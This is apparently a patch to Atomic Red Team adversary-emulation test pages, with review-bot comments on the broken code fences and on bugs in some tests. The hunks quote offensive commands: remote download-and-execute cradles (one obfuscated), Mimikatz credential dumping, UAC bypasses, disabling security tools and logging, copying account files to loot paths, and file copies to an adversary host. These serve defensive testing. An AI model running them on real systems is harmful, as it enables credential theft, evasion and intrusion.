cat /etc/mtab > /tmp/loot.txt
find . -type f -iname *.pdf > /tmp/loot.txt
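Review bot: all four hunks in T1083.md put ``` at the end of the heading line instead of on its own line, so the dir /s, ls -recurse, ls/file and find blocks render as prose and the following closing fences become openers. Revert to a separate ``` line after each heading.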
diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md
index bd651fa0..e07b36ed 100644
--- a/atomics/T1084/T1084.md
+++ b/atomics/T1084/T1084.md
@@ -25,8 +25,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
@@ -58,8 +57,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
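Review bot: both hunks in T1084.md join the heading and the opening fence (+#### Run it with `powershell`! ```), so the multi-line $FilterArgs hashtable and the WMI cleanup script will render as paragraphs, which also mangles their line breaks, and the unchanged closing fences open unintended blocks. Keep the fence on its own line.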
diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md
index c700033d..3ca3242e 100644
--- a/atomics/T1085/T1085.md
+++ b/atomics/T1085/T1085.md
@@ -24,8 +24,7 @@ Test execution of a remote script using rundll32.exe
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
```
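Review bot: the + line (+#### Run it with `command_prompt`! ```) is a heading that ends in backticks, not a fence, so the rundll32.exe javascript: line renders as text, where its embedded quotes and semicolons are easy to misread, and the closing ``` becomes an opener. Keep ``` on its own line after the heading.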
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index caa00b85..56dbeb9b 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -50,8 +50,7 @@ Download Mimikatz and dump credentials
|------|-------------|------|---------------|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
@@ -68,8 +67,7 @@ Download Bloodhound and run it
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
@@ -82,8 +80,7 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
@@ -97,8 +94,7 @@ Run mimikatz via PsSendKeys
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
@@ -112,8 +108,7 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
@@ -133,8 +128,7 @@ Using PS 5.1, add a user via CLI
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
@@ -153,8 +147,7 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -173,8 +166,7 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -192,8 +184,7 @@ Powershell xml download request
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@@ -211,8 +202,7 @@ Powershell invoke mshta to download payload
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
@@ -225,8 +215,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Powershell_ise as a Privileged Account
+#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
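Review bot: this hunk merges the first numbered step into the heading (+#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account), so step 1 is no longer a list item and the remaining "2. Invoke-DownloadCradle.ps1" line becomes an ordered list that starts at 2 (Markdown will renumber or render it oddly). Keep the heading and the "1." item on separate lines as in the removed text.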
@@ -239,8 +228,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
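Review bot: every fenced hunk in T1086.md (command_prompt and powershell variants) ends the heading with ``` instead of placing the fence on its own line, so the long one-line cradles, the New-LocalUser command and the reg.exe add / powershell.exe pair all render as paragraphs and each unchanged closing ``` opens a stray fence that swallows the next test's description. Revert to heading on one line and ``` on the next; the long download-cradle lines in particular are unreadable without a code block.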
diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md
index eb6b877a..13806a0c 100644
--- a/atomics/T1087/T1087.md
+++ b/atomics/T1087/T1087.md
@@ -54,8 +54,7 @@ Enumerate all accounts by copying /etc/passwd to another file
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat /etc/passwd > #{output_file}
```
@@ -72,8 +71,7 @@ xxx (requires root)
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat /etc/sudoers > #{output_file}
```
@@ -90,8 +88,7 @@ View accounts wtih UID 0
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
grep 'x:0:' /etc/passwd > #{output_file} - name: List opened files by user
```
@@ -103,8 +100,7 @@ List opened files by user
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
@@ -121,8 +117,7 @@ Show if a user account has ever logger in remotely
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
lastlog > #{output_file}
```
@@ -134,8 +129,7 @@ Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
groups
id
```
@@ -148,8 +142,7 @@ Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
@@ -165,8 +158,7 @@ Enumerate all accounts
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net user
net user /domain
dir c:\Users\
@@ -183,8 +175,7 @@ Enumerate all accounts via PowerShell
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
net user
net user /domain
get-localuser
@@ -206,8 +197,7 @@ Enumerate logged on users
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
query user
```
@@ -219,8 +209,7 @@ Enumerate logged on users via PowerShell
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
query user
```
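Review bot: all ten hunks in T1087.md attach the opening fence to the heading line (+#### Run it with `sh`! ```, command_prompt, powershell), so none of the cat/grep/lastlog/groups/dscl/net user/query user blocks render as code and each unchanged closing fence becomes an opener. Keep ``` on its own line after each heading. Two unchanged lines also deserve attention: the grep 'x:0:' command has "- name: List opened files by user" appended to it, which looks like YAML from the next test leaking into the generated command, and the headers "View accounts wtih UID 0", "has ever logger in remotely" and "xxx (requires root)" carry typos or a placeholder description.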
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
index 45b94964..679cf329 100644
--- a/atomics/T1088/T1088.md
+++ b/atomics/T1088/T1088.md
@@ -34,8 +34,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
@@ -53,8 +52,7 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
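Review bot: the executor heading says `command_prompt`, but `New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force`, `Set-ItemProperty ...` and `Start-Process ...` are PowerShell cmdlets and will not run under cmd.exe; the preceding test is the reg.exe variant, so this one should read `#### Run it with `powershell`!`. Keep the fence on its own line so the cmdlets render as code.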
@@ -73,8 +71,7 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
@@ -93,8 +90,7 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 58e645b2..72cc56f0 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -33,8 +33,7 @@ Disables the iptables firewall
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
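Review bot: `if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];` is fragile: the substitution is unquoted, so on a host without rpm or without the centos-release package it expands to nothing and test(1) reports a syntax error instead of falling through to the else branch, and `-eq` is an integer comparison being fed a version string. Use `[ "$(rpm -q --queryformat '%{VERSION}' centos-release 2>/dev/null)" = "6" ]`. The rsyslog and cbdaemon tests below repeat the same condition. The fence belongs on its own line, not on the heading.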
@@ -55,8 +54,7 @@ Disables syslog collection
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
@@ -75,8 +73,7 @@ Disable the Cb Response service
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
@@ -95,8 +92,7 @@ Disables SELinux enforcement
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
setenforce 0
```
@@ -108,8 +104,7 @@ Disables Carbon Black Response
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
@@ -121,8 +116,7 @@ Disables LittleSnitch
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
@@ -134,8 +128,7 @@ Disables OpenDNS Umbrella
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
@@ -152,8 +145,7 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
fltmc.exe unload #{sysmon_driver}
```
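Review bot: `Elevation Required (e.g. root or admin)` has been folded onto the heading line together with the fence, so it is neither a sentence the reader sees on its own nor a code block start that renderers honour. Put the elevation notice on its own line between the heading and the fence, and the fence on a line of its own; the `sysmon -u` test further down has the same problem.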
@@ -171,8 +163,7 @@ This action requires HTTP logging configurations in IIS to be unlocked.
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
@@ -184,8 +175,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
sysmon -u
```
diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md
index cbf73a16..fe5296e0 100644
--- a/atomics/T1090/T1090.md
+++ b/atomics/T1090/T1090.md
@@ -31,8 +31,7 @@ Note that this test may conflict with pre-existing system configuration.
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
export #{proxy_scheme}_proxy=#{proxy_server}
```
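Review bot: `export #{proxy_scheme}_proxy=#{proxy_server}` only sets the variable in the sh process that runs the test, so nothing on the host observes the change once that process exits. If the point is to exercise proxy-configuration detection, run a network command in the same line (for example a `curl` request after the export) or document that a persistent change requires a profile file. Keep the fence on its own line rather than on the heading, otherwise the command renders as prose.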
diff --git a/atomics/T1096/T1096.md b/atomics/T1096/T1096.md
index 46d1ac83..da71b4a2 100644
--- a/atomics/T1096/T1096.md
+++ b/atomics/T1096/T1096.md
@@ -26,8 +26,7 @@ Execute from Alternate Streams
|------|-------------|------|---------------|
| path | Path of ADS file | path | c:\ADS\|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
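Review bot: the first command hard-codes `C:\temp\evil.exe` and a TeamViewer log path instead of the `#{path}` input the table defines, while the extrac32 and findstr lines do use `#{path}`; either add those paths as inputs or drop the stray line. `findstr /V /L W3AllLov3DonaldTrump` is only a copy-through trick for writing into the alternate stream and deserves a comment saying so. Put the fence on its own line below the heading so these render as code.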
diff --git a/atomics/T1097/T1097.md b/atomics/T1097/T1097.md
index 02d2b600..84ecd61d 100644
--- a/atomics/T1097/T1097.md
+++ b/atomics/T1097/T1097.md
@@ -27,8 +27,7 @@ Similar to PTH, but attacking Kerberos
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mimikatz # kerberos::ptt #{user_name}@#{domain}
```
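Review bot: `mimikatz # kerberos::ptt #{user_name}@#{domain}` is a transcript of the interactive mimikatz prompt, not a command_prompt command, and `kerberos::ptt` takes a ticket file or directory rather than a user@domain pair, so the `user_name` and `domain` inputs cannot drive it as written. Either make it `mimikatz.exe "kerberos::ptt #{ticket_file}" exit` with a ticket-path input, or mark the test as manual. The fence must also start its own line under the heading.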
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index be4dab0b..ba9b7115 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -15,8 +15,7 @@ Manipulate Admin Account Name
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md
index 8d1f2314..739f6599 100644
--- a/atomics/T1099/T1099.md
+++ b/atomics/T1099/T1099.md
@@ -32,8 +32,7 @@ Stomps on the access timestamp of a file
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
touch -a -t 197001010000.00 #{target_filename}
```
@@ -50,8 +49,7 @@ Stomps on the modification timestamp of a file
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
touch -m -t 197001010000.00 #{target_filename}
```
@@ -71,8 +69,7 @@ Sudo or root privileges are required to change date. Use with caution.
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
@@ -96,8 +93,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
| reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
| target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
touch -acmr #{reference_file_path} {target_file_path}
```
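Review bot: `touch -acmr #{reference_file_path} {target_file_path}` is missing the `#` on the second placeholder, so the input is never substituted and touch creates a file literally named `{target_file_path}` in the working directory instead of stomping the target. Fix to `#{target_file_path}`. Keep the fence on its own line so the command renders as code.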
@@ -117,8 +113,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
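Review bot: `powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }` is launched by cmd.exe, so cmd parses the `|` itself and tries to run `%` as a program; PowerShell never sees the pipeline. Wrap the expression in `powershell.exe -Command "..."` and quote the date so `1970-01-01 00:00:00` reaches the property setter as one string. The LastWriteTime and LastAccessTime tests that follow have the same shape. The fence also needs its own line under the heading.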
@@ -138,8 +133,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
@@ -159,8 +153,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md
index 9f2ac967..0dbc17b7 100644
--- a/atomics/T1100/T1100.md
+++ b/atomics/T1100/T1100.md
@@ -25,8 +25,7 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | C:\AtomicRedTeam\atomics\T1100\shells\|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
xcopy #{web_shells} #{web_shell_path}
```
diff --git a/atomics/T1101/T1101.md b/atomics/T1101/T1101.md
index dd62804c..45c1b52e 100644
--- a/atomics/T1101/T1101.md
+++ b/atomics/T1101/T1101.md
@@ -20,8 +20,7 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
|------|-------------|------|---------------|
| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
diff --git a/atomics/T1103/T1103.md b/atomics/T1103/T1103.md
index 5c34338e..06389b36 100644
--- a/atomics/T1103/T1103.md
+++ b/atomics/T1103/T1103.md
@@ -22,8 +22,7 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
|------|-------------|------|---------------|
| registry_file | Windows Registry File | Path | T1103.reg|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg.exe import #{registry_file}
```
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 4bd3477f..6337796e 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -41,8 +41,7 @@ Utilize rsync to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```
@@ -62,8 +61,7 @@ Utilize rsync to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive rsync | Path | /tmp/victim-files|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```
@@ -83,8 +81,7 @@ Utilize scp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
@@ -104,8 +101,7 @@ Utilize scp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive scp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -125,8 +121,7 @@ Utilize sftp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
@@ -146,8 +141,7 @@ Utilize sftp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive sftp | Path | /tmp/victim-files/|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
@@ -165,8 +159,7 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
